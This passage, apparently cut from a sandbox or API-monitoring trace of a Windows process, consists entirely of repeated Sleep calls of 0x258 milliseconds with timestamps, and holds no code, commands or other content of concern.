(dwMilliseconds=0x258) [0218.840] Sleep (dwMilliseconds=0x258) [0218.854] Sleep (dwMilliseconds=0x258) [0218.870] Sleep (dwMilliseconds=0x258) [0218.887] Sleep (dwMilliseconds=0x258) [0218.901] Sleep (dwMilliseconds=0x258) [0218.919] Sleep (dwMilliseconds=0x258) [0218.979] Sleep (dwMilliseconds=0x258) [0219.026] Sleep (dwMilliseconds=0x258) [0219.089] Sleep (dwMilliseconds=0x258) [0219.105] Sleep (dwMilliseconds=0x258) [0219.120] Sleep (dwMilliseconds=0x258) [0219.182] Sleep (dwMilliseconds=0x258) [0219.245] Sleep (dwMilliseconds=0x258) [0219.260] Sleep (dwMilliseconds=0x258) [0219.275] Sleep (dwMilliseconds=0x258) [0219.338] Sleep (dwMilliseconds=0x258) [0219.401] Sleep (dwMilliseconds=0x258) [0219.422] Sleep (dwMilliseconds=0x258) [0219.431] Sleep (dwMilliseconds=0x258) [0219.495] Sleep (dwMilliseconds=0x258) [0219.510] Sleep (dwMilliseconds=0x258) [0219.572] Sleep (dwMilliseconds=0x258) [0219.587] Sleep (dwMilliseconds=0x258) [0219.650] Sleep (dwMilliseconds=0x258) [0219.665] Sleep (dwMilliseconds=0x258) [0219.728] Sleep (dwMilliseconds=0x258) [0219.743] Sleep (dwMilliseconds=0x258) [0219.807] Sleep (dwMilliseconds=0x258) [0219.822] Sleep (dwMilliseconds=0x258) [0219.884] Sleep (dwMilliseconds=0x258) [0219.899] Sleep (dwMilliseconds=0x258) [0219.962] Sleep (dwMilliseconds=0x258) [0219.977] Sleep (dwMilliseconds=0x258) [0220.059] Sleep (dwMilliseconds=0x258) [0220.134] Sleep (dwMilliseconds=0x258) [0220.155] Sleep (dwMilliseconds=0x258) [0220.166] Sleep (dwMilliseconds=0x258) [0220.180] Sleep (dwMilliseconds=0x258) [0220.243] Sleep (dwMilliseconds=0x258) [0220.306] Sleep (dwMilliseconds=0x258) [0220.321] Sleep (dwMilliseconds=0x258) [0220.336] Sleep (dwMilliseconds=0x258) [0220.399] Sleep (dwMilliseconds=0x258) [0220.461] Sleep (dwMilliseconds=0x258) [0220.477] Sleep (dwMilliseconds=0x258) [0220.492] Sleep (dwMilliseconds=0x258) [0220.555] Sleep (dwMilliseconds=0x258) [0220.618] Sleep (dwMilliseconds=0x258) [0220.633] Sleep (dwMilliseconds=0x258) [0220.648] Sleep (dwMilliseconds=0x258) [0220.711] Sleep (dwMilliseconds=0x258) [0220.758] Sleep (dwMilliseconds=0x258) [0220.780] Sleep (dwMilliseconds=0x258) [0220.789] Sleep (dwMilliseconds=0x258) [0220.804] Sleep (dwMilliseconds=0x258) [0220.867] Sleep (dwMilliseconds=0x258) [0220.930] Sleep (dwMilliseconds=0x258) [0220.945] Sleep (dwMilliseconds=0x258) [0220.961] Sleep (dwMilliseconds=0x258) [0221.023] Sleep (dwMilliseconds=0x258) [0221.101] Sleep (dwMilliseconds=0x258) [0221.153] Sleep (dwMilliseconds=0x258) [0221.210] Sleep (dwMilliseconds=0x258) [0221.226] Sleep (dwMilliseconds=0x258) [0221.241] Sleep (dwMilliseconds=0x258) [0221.304] Sleep (dwMilliseconds=0x258) [0221.320] Sleep (dwMilliseconds=0x258) [0221.381] Sleep (dwMilliseconds=0x258) [0221.397] Sleep (dwMilliseconds=0x258) [0221.459] Sleep (dwMilliseconds=0x258) [0221.475] Sleep (dwMilliseconds=0x258) [0221.537] Sleep (dwMilliseconds=0x258) [0221.562] Sleep (dwMilliseconds=0x258) [0221.620] Sleep (dwMilliseconds=0x258) [0221.636] Sleep (dwMilliseconds=0x258) [0221.648] Sleep (dwMilliseconds=0x258) [0221.709] Sleep (dwMilliseconds=0x258) [0221.725] Sleep (dwMilliseconds=0x258) [0221.787] Sleep (dwMilliseconds=0x258) [0221.807] Sleep (dwMilliseconds=0x258) [0221.865] Sleep (dwMilliseconds=0x258) [0221.889] Sleep (dwMilliseconds=0x258) [0221.896] Sleep (dwMilliseconds=0x258) [0221.960] Sleep (dwMilliseconds=0x258) [0221.981] Sleep (dwMilliseconds=0x258) [0222.037] Sleep (dwMilliseconds=0x258) [0222.079] Sleep (dwMilliseconds=0x258) [0222.131] Sleep (dwMilliseconds=0x258) [0222.163] Sleep (dwMilliseconds=0x258) [0222.224] Sleep (dwMilliseconds=0x258) [0222.244] Sleep (dwMilliseconds=0x258) [0222.255] Sleep (dwMilliseconds=0x258) [0222.319] Sleep (dwMilliseconds=0x258) [0222.342] Sleep (dwMilliseconds=0x258) [0222.395] Sleep (dwMilliseconds=0x258) [0222.411] Sleep (dwMilliseconds=0x258) [0222.427] Sleep (dwMilliseconds=0x258) [0222.474] Sleep (dwMilliseconds=0x258) [0222.498] Sleep (dwMilliseconds=0x258) [0222.552] Sleep (dwMilliseconds=0x258) [0222.570] Sleep (dwMilliseconds=0x258) [0222.583] Sleep (dwMilliseconds=0x258) [0222.630] Sleep (dwMilliseconds=0x258) [0222.657] Sleep (dwMilliseconds=0x258) [0222.661] Sleep (dwMilliseconds=0x258) [0222.723] Sleep (dwMilliseconds=0x258) [0222.739] Sleep (dwMilliseconds=0x258) [0222.802] Sleep (dwMilliseconds=0x258) [0222.825] Sleep (dwMilliseconds=0x258) [0222.879] Sleep (dwMilliseconds=0x258) [0222.896] Sleep (dwMilliseconds=0x258) [0222.911] Sleep (dwMilliseconds=0x258) [0222.960] Sleep (dwMilliseconds=0x258) [0222.981] Sleep (dwMilliseconds=0x258) [0222.988] Sleep (dwMilliseconds=0x258) [0223.065] Sleep (dwMilliseconds=0x258) [0223.071] Sleep (dwMilliseconds=0x258) [0223.129] Sleep (dwMilliseconds=0x258) [0223.145] Sleep (dwMilliseconds=0x258) [0223.160] Sleep (dwMilliseconds=0x258) [0223.222] Sleep (dwMilliseconds=0x258) [0223.285] Sleep (dwMilliseconds=0x258) [0223.300] Sleep (dwMilliseconds=0x258) [0223.316] Sleep (dwMilliseconds=0x258) [0223.394] Sleep (dwMilliseconds=0x258) [0223.426] Sleep (dwMilliseconds=0x258) [0223.477] Sleep (dwMilliseconds=0x258) [0223.487] Sleep (dwMilliseconds=0x258) [0223.503] Sleep (dwMilliseconds=0x258) [0223.521] Sleep (dwMilliseconds=0x258) [0223.534] Sleep (dwMilliseconds=0x258) [0223.598] Sleep (dwMilliseconds=0x258) [0223.644] Sleep (dwMilliseconds=0x258) [0223.669] Sleep (dwMilliseconds=0x258) [0223.675] Sleep (dwMilliseconds=0x258) [0223.690] Sleep (dwMilliseconds=0x258) [0223.707] Sleep (dwMilliseconds=0x258) [0223.721] Sleep (dwMilliseconds=0x258) [0223.737] Sleep (dwMilliseconds=0x258) [0223.799] Sleep (dwMilliseconds=0x258) [0223.847] Sleep (dwMilliseconds=0x258) [0223.876] Sleep (dwMilliseconds=0x258) [0223.877] Sleep (dwMilliseconds=0x258) [0223.893] Sleep (dwMilliseconds=0x258) [0223.909] Sleep (dwMilliseconds=0x258) [0223.925] Sleep (dwMilliseconds=0x258) [0223.941] Sleep (dwMilliseconds=0x258) [0224.002] Sleep (dwMilliseconds=0x258) [0224.080] Sleep (dwMilliseconds=0x258) [0224.097] Sleep (dwMilliseconds=0x258) [0224.113] Sleep (dwMilliseconds=0x258) [0224.127] Sleep (dwMilliseconds=0x258) [0224.152] Sleep (dwMilliseconds=0x258) [0224.158] Sleep (dwMilliseconds=0x258) [0224.174] Sleep (dwMilliseconds=0x258) [0224.236] Sleep (dwMilliseconds=0x258) [0224.283] Sleep (dwMilliseconds=0x258) [0224.305] Sleep (dwMilliseconds=0x258) [0224.314] Sleep (dwMilliseconds=0x258) [0224.330] Sleep (dwMilliseconds=0x258) [0224.346] Sleep (dwMilliseconds=0x258) [0224.361] Sleep (dwMilliseconds=0x258) [0224.377] Sleep (dwMilliseconds=0x258) [0224.393] Sleep (dwMilliseconds=0x258) [0224.455] Sleep (dwMilliseconds=0x258) [0224.515] Sleep (dwMilliseconds=0x258) [0224.529] Sleep (dwMilliseconds=0x258) [0224.553] Sleep (dwMilliseconds=0x258) [0224.564] Sleep (dwMilliseconds=0x258) [0224.580] Sleep (dwMilliseconds=0x258) [0224.595] Sleep (dwMilliseconds=0x258) [0224.658] Sleep (dwMilliseconds=0x258) [0224.705] Sleep (dwMilliseconds=0x258) [0224.720] Sleep (dwMilliseconds=0x258) [0224.736] Sleep (dwMilliseconds=0x258) [0224.752] Sleep (dwMilliseconds=0x258) [0224.767] Sleep (dwMilliseconds=0x258) [0224.782] Sleep (dwMilliseconds=0x258) [0224.798] Sleep (dwMilliseconds=0x258) [0224.864] Sleep (dwMilliseconds=0x258) [0224.907] Sleep (dwMilliseconds=0x258) [0224.995] Sleep (dwMilliseconds=0x258) [0225.001] Sleep (dwMilliseconds=0x258) [0225.016] Sleep (dwMilliseconds=0x258) [0225.032] Sleep (dwMilliseconds=0x258) [0225.080] Sleep (dwMilliseconds=0x258) [0225.142] Sleep (dwMilliseconds=0x258) [0225.189] Sleep (dwMilliseconds=0x258) [0225.214] Sleep (dwMilliseconds=0x258) [0225.224] Sleep (dwMilliseconds=0x258) [0225.235] Sleep (dwMilliseconds=0x258) [0225.251] Sleep (dwMilliseconds=0x258) [0225.266] Sleep (dwMilliseconds=0x258) [0225.282] Sleep (dwMilliseconds=0x258) [0225.344] Sleep (dwMilliseconds=0x258) [0225.391] Sleep (dwMilliseconds=0x258) [0225.406] Sleep (dwMilliseconds=0x258) [0225.423] Sleep (dwMilliseconds=0x258) [0225.438] Sleep (dwMilliseconds=0x258) [0225.453] Sleep (dwMilliseconds=0x258) [0225.469] Sleep (dwMilliseconds=0x258) [0225.484] Sleep (dwMilliseconds=0x258) [0225.547] Sleep (dwMilliseconds=0x258) [0225.594] Sleep (dwMilliseconds=0x258) [0225.623] Sleep (dwMilliseconds=0x258) [0225.625] Sleep (dwMilliseconds=0x258) [0225.640] Sleep (dwMilliseconds=0x258) [0225.656] Sleep (dwMilliseconds=0x258) [0225.672] Sleep (dwMilliseconds=0x258) [0225.688] Sleep (dwMilliseconds=0x258) [0225.736] Sleep (dwMilliseconds=0x258) [0225.782] Sleep (dwMilliseconds=0x258) [0225.828] Sleep (dwMilliseconds=0x258) [0225.846] Sleep (dwMilliseconds=0x258) [0225.859] Sleep (dwMilliseconds=0x258) [0225.876] Sleep (dwMilliseconds=0x258) [0225.890] Sleep (dwMilliseconds=0x258) [0225.906] Sleep (dwMilliseconds=0x258) [0225.968] Sleep (dwMilliseconds=0x258) [0226.015] Sleep (dwMilliseconds=0x258) [0226.042] Sleep (dwMilliseconds=0x258) [0226.064] Sleep (dwMilliseconds=0x258) [0226.077] Sleep (dwMilliseconds=0x258) [0226.093] Sleep (dwMilliseconds=0x258) [0226.108] Sleep (dwMilliseconds=0x258) [0226.171] Sleep (dwMilliseconds=0x258) [0226.218] Sleep (dwMilliseconds=0x258) [0226.244] Sleep (dwMilliseconds=0x258) [0226.249] Sleep (dwMilliseconds=0x258) [0226.266] Sleep (dwMilliseconds=0x258) [0226.282] Sleep (dwMilliseconds=0x258) [0226.296] Sleep (dwMilliseconds=0x258) [0226.311] Sleep (dwMilliseconds=0x258) [0226.373] Sleep (dwMilliseconds=0x258) [0226.420] Sleep (dwMilliseconds=0x258) [0226.445] Sleep (dwMilliseconds=0x258) [0226.451] Sleep (dwMilliseconds=0x258) [0226.467] Sleep (dwMilliseconds=0x258) [0226.483] Sleep (dwMilliseconds=0x258) [0226.500] Sleep (dwMilliseconds=0x258) [0226.514] Sleep (dwMilliseconds=0x258) [0226.577] Sleep (dwMilliseconds=0x258) [0226.623] Sleep (dwMilliseconds=0x258) [0226.658] Sleep (dwMilliseconds=0x258) [0226.670] Sleep (dwMilliseconds=0x258) [0226.686] Sleep (dwMilliseconds=0x258) [0226.702] Sleep (dwMilliseconds=0x258) [0226.717] Sleep (dwMilliseconds=0x258) [0226.779] Sleep (dwMilliseconds=0x258) [0226.829] Sleep (dwMilliseconds=0x258) [0226.874] Sleep (dwMilliseconds=0x258) [0226.888] Sleep (dwMilliseconds=0x258) [0226.904] Sleep (dwMilliseconds=0x258) [0226.919] Sleep (dwMilliseconds=0x258) [0226.936] Sleep (dwMilliseconds=0x258) [0226.998] Sleep (dwMilliseconds=0x258) [0227.069] Sleep (dwMilliseconds=0x258) [0227.098] Sleep (dwMilliseconds=0x258) [0227.107] Sleep (dwMilliseconds=0x258) [0227.122] Sleep (dwMilliseconds=0x258) [0227.138] Sleep (dwMilliseconds=0x258) [0227.153] Sleep (dwMilliseconds=0x258) [0227.170] Sleep (dwMilliseconds=0x258) [0227.231] Sleep (dwMilliseconds=0x258) [0227.296] Sleep (dwMilliseconds=0x258) [0227.341] Sleep (dwMilliseconds=0x258) [0227.391] Sleep (dwMilliseconds=0x258) [0227.451] Sleep (dwMilliseconds=0x258) [0227.471] Sleep (dwMilliseconds=0x258) [0227.481] Sleep (dwMilliseconds=0x258) [0227.543] Sleep (dwMilliseconds=0x258) [0227.566] Sleep (dwMilliseconds=0x258) [0227.618] Sleep (dwMilliseconds=0x258) [0227.657] Sleep (dwMilliseconds=0x258) [0227.721] Sleep (dwMilliseconds=0x258) [0227.743] Sleep (dwMilliseconds=0x258) [0227.746] Sleep (dwMilliseconds=0x258) [0227.809] Sleep (dwMilliseconds=0x258) [0227.826] Sleep (dwMilliseconds=0x258) [0227.887] Sleep (dwMilliseconds=0x258) [0227.909] Sleep (dwMilliseconds=0x258) [0227.965] Sleep (dwMilliseconds=0x258) [0227.980] Sleep (dwMilliseconds=0x258) [0227.996] Sleep (dwMilliseconds=0x258) [0228.058] Sleep (dwMilliseconds=0x258) [0228.121] Sleep (dwMilliseconds=0x258) [0228.144] Sleep (dwMilliseconds=0x258) [0228.152] Sleep (dwMilliseconds=0x258) [0228.168] Sleep (dwMilliseconds=0x258) [0228.230] Sleep (dwMilliseconds=0x258) [0228.303] Sleep (dwMilliseconds=0x258) [0228.322] Sleep (dwMilliseconds=0x258) [0228.323] Sleep (dwMilliseconds=0x258) [0228.347] Sleep (dwMilliseconds=0x258) [0228.401] Sleep (dwMilliseconds=0x258) [0228.464] Sleep (dwMilliseconds=0x258) [0228.479] Sleep (dwMilliseconds=0x258) [0228.495] Sleep (dwMilliseconds=0x258) [0228.557] Sleep (dwMilliseconds=0x258) [0228.621] Sleep (dwMilliseconds=0x258) [0228.636] Sleep (dwMilliseconds=0x258) [0228.651] Sleep (dwMilliseconds=0x258) [0228.667] Sleep (dwMilliseconds=0x258) [0228.730] Sleep (dwMilliseconds=0x258) [0228.801] Sleep (dwMilliseconds=0x258) [0228.809] Sleep (dwMilliseconds=0x258) [0228.823] Sleep (dwMilliseconds=0x258) [0228.885] Sleep (dwMilliseconds=0x258) [0228.949] Sleep (dwMilliseconds=0x258) [0228.973] Sleep (dwMilliseconds=0x258) [0228.979] Sleep (dwMilliseconds=0x258) [0228.994] Sleep (dwMilliseconds=0x258) [0229.057] Sleep (dwMilliseconds=0x258) [0229.120] Sleep (dwMilliseconds=0x258) [0229.150] Sleep (dwMilliseconds=0x258) [0229.166] Sleep (dwMilliseconds=0x258) [0229.214] Sleep (dwMilliseconds=0x258) [0229.245] Sleep (dwMilliseconds=0x258) [0229.306] Sleep (dwMilliseconds=0x258) [0229.334] Sleep (dwMilliseconds=0x258) [0229.337] Sleep (dwMilliseconds=0x258) [0229.402] Sleep (dwMilliseconds=0x258) [0229.428] Sleep (dwMilliseconds=0x258) [0229.478] Sleep (dwMilliseconds=0x258) [0229.495] Sleep (dwMilliseconds=0x258) [0229.510] Sleep (dwMilliseconds=0x258) [0229.572] Sleep (dwMilliseconds=0x258) [0229.591] Sleep (dwMilliseconds=0x258) [0229.650] Sleep (dwMilliseconds=0x258) [0229.673] Sleep (dwMilliseconds=0x258) [0229.681] Sleep (dwMilliseconds=0x258) [0229.743] Sleep (dwMilliseconds=0x258) [0229.759] Sleep (dwMilliseconds=0x258) [0229.821] Sleep (dwMilliseconds=0x258) [0229.837] Sleep (dwMilliseconds=0x258) [0229.900] Sleep (dwMilliseconds=0x258) [0229.915] Sleep (dwMilliseconds=0x258) [0229.977] Sleep (dwMilliseconds=0x258) [0229.993] Sleep (dwMilliseconds=0x258) [0230.055] Sleep (dwMilliseconds=0x258) [0230.073] Sleep (dwMilliseconds=0x258) [0230.141] Sleep (dwMilliseconds=0x258) [0230.149] Sleep (dwMilliseconds=0x258) [0230.165] Sleep (dwMilliseconds=0x258) [0230.227] Sleep (dwMilliseconds=0x258) [0230.289] Sleep (dwMilliseconds=0x258) [0230.305] Sleep (dwMilliseconds=0x258) [0230.329] Sleep (dwMilliseconds=0x258) [0230.336] Sleep (dwMilliseconds=0x258) [0230.398] Sleep (dwMilliseconds=0x258) [0230.446] Sleep (dwMilliseconds=0x258) [0230.482] Sleep (dwMilliseconds=0x258) [0230.492] Sleep (dwMilliseconds=0x258) [0230.508] Sleep (dwMilliseconds=0x258) [0230.523] Sleep (dwMilliseconds=0x258) [0230.539] Sleep (dwMilliseconds=0x258) [0230.555] Sleep (dwMilliseconds=0x258) [0230.617] Sleep (dwMilliseconds=0x258) [0230.664] Sleep (dwMilliseconds=0x258) [0230.679] Sleep (dwMilliseconds=0x258) [0230.705] Sleep (dwMilliseconds=0x258) [0230.710] Sleep (dwMilliseconds=0x258) [0230.728] Sleep (dwMilliseconds=0x258) [0230.742] Sleep (dwMilliseconds=0x258) [0230.757] Sleep (dwMilliseconds=0x258) [0230.820] Sleep (dwMilliseconds=0x258) [0230.866] Sleep (dwMilliseconds=0x258) [0230.904] Sleep (dwMilliseconds=0x258) [0230.913] Sleep (dwMilliseconds=0x258) [0230.929] Sleep (dwMilliseconds=0x258) [0230.944] Sleep (dwMilliseconds=0x258) [0230.960] Sleep (dwMilliseconds=0x258) [0230.976] Sleep (dwMilliseconds=0x258) [0231.058] Sleep (dwMilliseconds=0x258) [0231.101] Sleep (dwMilliseconds=0x258) [0231.116] Sleep (dwMilliseconds=0x258) [0231.131] Sleep (dwMilliseconds=0x258) [0231.147] Sleep (dwMilliseconds=0x258) [0231.163] Sleep (dwMilliseconds=0x258) [0231.179] Sleep (dwMilliseconds=0x258) [0231.194] Sleep (dwMilliseconds=0x258) [0231.256] Sleep (dwMilliseconds=0x258) [0231.303] Sleep (dwMilliseconds=0x258) [0231.319] Sleep (dwMilliseconds=0x258) [0231.344] Sleep (dwMilliseconds=0x258) [0231.352] Sleep (dwMilliseconds=0x258) [0231.366] Sleep (dwMilliseconds=0x258) [0231.381] Sleep (dwMilliseconds=0x258) [0231.397] Sleep (dwMilliseconds=0x258) [0231.462] Sleep (dwMilliseconds=0x258) [0231.506] Sleep (dwMilliseconds=0x258) [0231.531] Sleep (dwMilliseconds=0x258) [0231.540] Sleep (dwMilliseconds=0x258) [0231.553] Sleep (dwMilliseconds=0x258) [0231.570] Sleep (dwMilliseconds=0x258) [0231.584] Sleep (dwMilliseconds=0x258) [0231.599] Sleep (dwMilliseconds=0x258) [0231.663] Sleep (dwMilliseconds=0x258) [0231.710] Sleep (dwMilliseconds=0x258) [0231.760] Sleep (dwMilliseconds=0x258) [0231.771] Sleep (dwMilliseconds=0x258) [0231.787] Sleep (dwMilliseconds=0x258) [0231.805] Sleep (dwMilliseconds=0x258) [0231.818] Sleep (dwMilliseconds=0x258) [0231.880] Sleep (dwMilliseconds=0x258) [0231.927] Sleep (dwMilliseconds=0x258) [0231.947] Sleep (dwMilliseconds=0x258) [0231.958] Sleep (dwMilliseconds=0x258) [0231.975] Sleep (dwMilliseconds=0x258) [0231.990] Sleep (dwMilliseconds=0x258) [0232.005] Sleep (dwMilliseconds=0x258) [0232.021] Sleep (dwMilliseconds=0x258) [0232.085] Sleep (dwMilliseconds=0x258) [0232.130] Sleep (dwMilliseconds=0x258) [0232.182] Sleep (dwMilliseconds=0x258) [0232.205] Sleep (dwMilliseconds=0x258) [0232.209] Sleep (dwMilliseconds=0x258) [0232.225] Sleep (dwMilliseconds=0x258) [0232.239] Sleep (dwMilliseconds=0x258) [0232.256] Sleep (dwMilliseconds=0x258) [0232.270] Sleep (dwMilliseconds=0x258) [0232.286] Sleep (dwMilliseconds=0x258) [0232.349] Sleep (dwMilliseconds=0x258) [0232.399] Sleep (dwMilliseconds=0x258) [0232.439] Sleep (dwMilliseconds=0x258) [0232.442] Sleep (dwMilliseconds=0x258) [0232.458] Sleep (dwMilliseconds=0x258) [0232.473] Sleep (dwMilliseconds=0x258) [0232.489] Sleep (dwMilliseconds=0x258) [0232.504] Sleep (dwMilliseconds=0x258) [0232.567] Sleep (dwMilliseconds=0x258) [0232.613] Sleep (dwMilliseconds=0x258) [0232.629] Sleep (dwMilliseconds=0x258) [0232.647] Sleep (dwMilliseconds=0x258) [0232.662] Sleep (dwMilliseconds=0x258) [0232.679] Sleep (dwMilliseconds=0x258) [0232.691] Sleep (dwMilliseconds=0x258) [0232.707] Sleep (dwMilliseconds=0x258) [0232.770] Sleep (dwMilliseconds=0x258) [0232.817] Sleep (dwMilliseconds=0x258) [0232.861] Sleep (dwMilliseconds=0x258) [0232.863] Sleep (dwMilliseconds=0x258) [0232.879] Sleep (dwMilliseconds=0x258) [0232.894] Sleep (dwMilliseconds=0x258) [0232.910] Sleep (dwMilliseconds=0x258) [0232.926] Sleep (dwMilliseconds=0x258) [0232.988] Sleep (dwMilliseconds=0x258) [0233.035] Sleep (dwMilliseconds=0x258) [0233.092] Sleep (dwMilliseconds=0x258) [0233.098] Sleep (dwMilliseconds=0x258) [0233.113] Sleep (dwMilliseconds=0x258) [0233.129] Sleep (dwMilliseconds=0x258) [0233.144] Sleep (dwMilliseconds=0x258) [0233.159] Sleep (dwMilliseconds=0x258) [0233.222] Sleep (dwMilliseconds=0x258) [0233.270] Sleep (dwMilliseconds=0x258) [0233.305] Sleep (dwMilliseconds=0x258) [0233.316] Sleep (dwMilliseconds=0x258) [0233.331] Sleep (dwMilliseconds=0x258) [0233.347] Sleep (dwMilliseconds=0x258) [0233.363] Sleep (dwMilliseconds=0x258) [0233.383] Sleep (dwMilliseconds=0x258) [0233.440] Sleep (dwMilliseconds=0x258) [0233.487] Sleep (dwMilliseconds=0x258) [0233.536] Sleep (dwMilliseconds=0x258) [0233.549] Sleep (dwMilliseconds=0x258) [0233.565] Sleep (dwMilliseconds=0x258) [0233.581] Sleep (dwMilliseconds=0x258) [0233.597] Sleep (dwMilliseconds=0x258) [0233.612] Sleep (dwMilliseconds=0x258) [0233.674] Sleep (dwMilliseconds=0x258) [0233.721] Sleep (dwMilliseconds=0x258) [0233.759] Sleep (dwMilliseconds=0x258) [0233.768] Sleep (dwMilliseconds=0x258) [0233.784] Sleep (dwMilliseconds=0x258) [0233.819] Sleep (dwMilliseconds=0x258) [0233.831] Sleep (dwMilliseconds=0x258) [0233.892] Sleep (dwMilliseconds=0x258) [0233.941] Sleep (dwMilliseconds=0x258) [0233.967] Sleep (dwMilliseconds=0x258) [0233.971] Sleep (dwMilliseconds=0x258) [0233.986] Sleep (dwMilliseconds=0x258) [0234.002] Sleep (dwMilliseconds=0x258) [0234.018] Sleep (dwMilliseconds=0x258) [0234.033] Sleep (dwMilliseconds=0x258) [0234.111] Sleep (dwMilliseconds=0x258) [0234.159] Sleep (dwMilliseconds=0x258) [0234.202] Sleep (dwMilliseconds=0x258) [0234.205] Sleep (dwMilliseconds=0x258) [0234.221] Sleep (dwMilliseconds=0x258) [0234.236] Sleep (dwMilliseconds=0x258) [0234.252] Sleep (dwMilliseconds=0x258) [0234.267] Sleep (dwMilliseconds=0x258) [0234.330] Sleep (dwMilliseconds=0x258) [0234.377] Sleep (dwMilliseconds=0x258) [0234.411] Sleep (dwMilliseconds=0x258) [0234.423] Sleep (dwMilliseconds=0x258) [0234.441] Sleep (dwMilliseconds=0x258) [0234.454] Sleep (dwMilliseconds=0x258) [0234.470] Sleep (dwMilliseconds=0x258) [0234.486] Sleep (dwMilliseconds=0x258) [0234.548] Sleep (dwMilliseconds=0x258) [0234.595] Sleep (dwMilliseconds=0x258) [0234.628] Sleep (dwMilliseconds=0x258) [0234.641] Sleep (dwMilliseconds=0x258) [0234.657] Sleep (dwMilliseconds=0x258) [0234.673] Sleep (dwMilliseconds=0x258) [0234.689] Sleep (dwMilliseconds=0x258) [0234.704] Sleep (dwMilliseconds=0x258) [0234.766] Sleep (dwMilliseconds=0x258) [0234.813] Sleep (dwMilliseconds=0x258) [0234.872] Sleep (dwMilliseconds=0x258) [0234.881] Sleep (dwMilliseconds=0x258) [0234.893] Sleep (dwMilliseconds=0x258) [0234.909] Sleep (dwMilliseconds=0x258) [0234.924] Sleep (dwMilliseconds=0x258) [0234.940] Sleep (dwMilliseconds=0x258) [0235.001] Sleep (dwMilliseconds=0x258) [0235.062] Sleep (dwMilliseconds=0x258) [0235.074] Sleep (dwMilliseconds=0x258) [0235.080] Sleep (dwMilliseconds=0x258) [0235.094] Sleep (dwMilliseconds=0x258) [0235.110] Sleep (dwMilliseconds=0x258) [0235.126] Sleep (dwMilliseconds=0x258) [0235.141] Sleep (dwMilliseconds=0x258) [0235.156] Sleep (dwMilliseconds=0x258) [0235.212] Sleep (dwMilliseconds=0x258) [0235.251] Sleep (dwMilliseconds=0x258) [0235.311] Sleep (dwMilliseconds=0x258) [0235.314] Sleep (dwMilliseconds=0x258) [0235.328] Sleep (dwMilliseconds=0x258) [0235.345] Sleep (dwMilliseconds=0x258) [0235.359] Sleep (dwMilliseconds=0x258) [0235.375] Sleep (dwMilliseconds=0x258) [0235.437] Sleep (dwMilliseconds=0x258) [0235.484] Sleep (dwMilliseconds=0x258) [0235.541] Sleep (dwMilliseconds=0x258) [0235.546] Sleep (dwMilliseconds=0x258) [0235.562] Sleep (dwMilliseconds=0x258) [0235.578] Sleep (dwMilliseconds=0x258) [0235.595] Sleep (dwMilliseconds=0x258) [0235.656] Sleep (dwMilliseconds=0x258) [0235.702] Sleep (dwMilliseconds=0x258) [0235.737] Sleep (dwMilliseconds=0x258) [0235.749] Sleep (dwMilliseconds=0x258) [0235.765] Sleep (dwMilliseconds=0x258) [0235.780] Sleep (dwMilliseconds=0x258) [0235.796] Sleep (dwMilliseconds=0x258) [0235.812] Sleep (dwMilliseconds=0x258) [0235.874] Sleep (dwMilliseconds=0x258) [0235.922] Sleep (dwMilliseconds=0x258) [0235.965] Sleep (dwMilliseconds=0x258) [0235.969] Sleep (dwMilliseconds=0x258) [0235.984] Sleep (dwMilliseconds=0x258) [0236.000] Sleep (dwMilliseconds=0x258) [0236.017] Sleep (dwMilliseconds=0x258) [0236.031] Sleep (dwMilliseconds=0x258) [0236.108] Sleep (dwMilliseconds=0x258) [0236.155] Sleep (dwMilliseconds=0x258) [0236.189] Sleep (dwMilliseconds=0x258) [0236.202] Sleep (dwMilliseconds=0x258) [0236.217] Sleep (dwMilliseconds=0x258) [0236.233] Sleep (dwMilliseconds=0x258) [0236.248] Sleep (dwMilliseconds=0x258) [0236.265] Sleep (dwMilliseconds=0x258) [0236.326] Sleep (dwMilliseconds=0x258) [0236.373] Sleep (dwMilliseconds=0x258) [0236.389] Sleep (dwMilliseconds=0x258) [0236.405] Sleep (dwMilliseconds=0x258) [0236.420] Sleep (dwMilliseconds=0x258) [0236.438] Sleep (dwMilliseconds=0x258) [0236.451] Sleep (dwMilliseconds=0x258) [0236.480] Sleep (dwMilliseconds=0x258) [0236.529] Sleep (dwMilliseconds=0x258) [0236.576] Sleep (dwMilliseconds=0x258) [0236.614] Sleep (dwMilliseconds=0x258) [0236.623] Sleep (dwMilliseconds=0x258) [0236.639] Sleep (dwMilliseconds=0x258) [0236.654] Sleep (dwMilliseconds=0x258) [0236.670] Sleep (dwMilliseconds=0x258) [0236.685] Sleep (dwMilliseconds=0x258) [0236.749] Sleep (dwMilliseconds=0x258) [0236.794] Sleep (dwMilliseconds=0x258) [0236.824] Sleep (dwMilliseconds=0x258) [0236.825] Sleep (dwMilliseconds=0x258) [0236.848] Sleep (dwMilliseconds=0x258) [0236.858] Sleep (dwMilliseconds=0x258) [0236.872] Sleep (dwMilliseconds=0x258) [0236.888] Sleep (dwMilliseconds=0x258) [0236.951] Sleep (dwMilliseconds=0x258) [0236.997] Sleep (dwMilliseconds=0x258) [0237.040] Sleep (dwMilliseconds=0x258) [0237.064] Sleep (dwMilliseconds=0x258) [0237.075] Sleep (dwMilliseconds=0x258) [0237.091] Sleep (dwMilliseconds=0x258) [0237.107] Sleep (dwMilliseconds=0x258) [0237.170] Sleep (dwMilliseconds=0x258) [0237.216] Sleep (dwMilliseconds=0x258) [0237.251] Sleep (dwMilliseconds=0x258) [0237.262] Sleep (dwMilliseconds=0x258) [0237.279] Sleep (dwMilliseconds=0x258) [0237.293] Sleep (dwMilliseconds=0x258) [0237.309] Sleep (dwMilliseconds=0x258) [0237.325] Sleep (dwMilliseconds=0x258) [0237.388] Sleep (dwMilliseconds=0x258) [0237.434] Sleep (dwMilliseconds=0x258) [0237.450] Sleep (dwMilliseconds=0x258) [0237.465] Sleep (dwMilliseconds=0x258) [0237.497] Sleep (dwMilliseconds=0x258) [0237.512] Sleep (dwMilliseconds=0x258) [0237.528] Sleep (dwMilliseconds=0x258) [0237.590] Sleep (dwMilliseconds=0x258) [0237.637] Sleep (dwMilliseconds=0x258) [0237.652] Sleep (dwMilliseconds=0x258) [0237.668] Sleep (dwMilliseconds=0x258) [0237.684] Sleep (dwMilliseconds=0x258) [0237.699] Sleep (dwMilliseconds=0x258) [0237.715] Sleep (dwMilliseconds=0x258) [0237.731] Sleep (dwMilliseconds=0x258) [0237.793] Sleep (dwMilliseconds=0x258) [0237.848] Sleep (dwMilliseconds=0x258) [0237.866] Sleep (dwMilliseconds=0x258) [0237.871] Sleep (dwMilliseconds=0x258) [0237.889] Sleep (dwMilliseconds=0x258) [0237.921] 